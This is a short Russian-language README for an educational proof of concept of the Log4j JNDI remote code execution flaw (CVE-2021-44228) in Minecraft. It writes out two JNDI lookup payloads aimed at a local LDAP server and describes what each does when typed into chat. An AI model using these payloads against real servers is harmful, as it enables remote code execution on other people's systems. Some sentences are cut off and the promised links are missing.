
Образовательный Proof of Concept для уязвимости Log4j (CVE-2021-44228) в Minecraft
Этот проект создан только в образовательных целях.
Это доказательство концепции RCE-уязвимости log4j, адаптированное из HyCraftHD.
Вот несколько ссылок по CVE-2021-44228:
Эта ошибка затрагивает почти все версии log4j2 и, возможно, log4j1. Рекомендуемая версия — 2.15.0, которая исправляет эксплойт.
${jndi:ldap://127.0.0.1/e} в чат. Если на порту 389 есть открытый сокет, logj4 пытается подключиться и блокирует дальнейшую коммуникацию до истечения тайм-аута.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, которая представляет собой сериализованный строковый объект от ldap-сервера.
${jndi:ldap://127.0.0.1/exe} в чат. Если -Dcom.sun.jndi.ldap.object.trustURLCodebase=true установлен в true, произойдёт удалённое выполнение кода.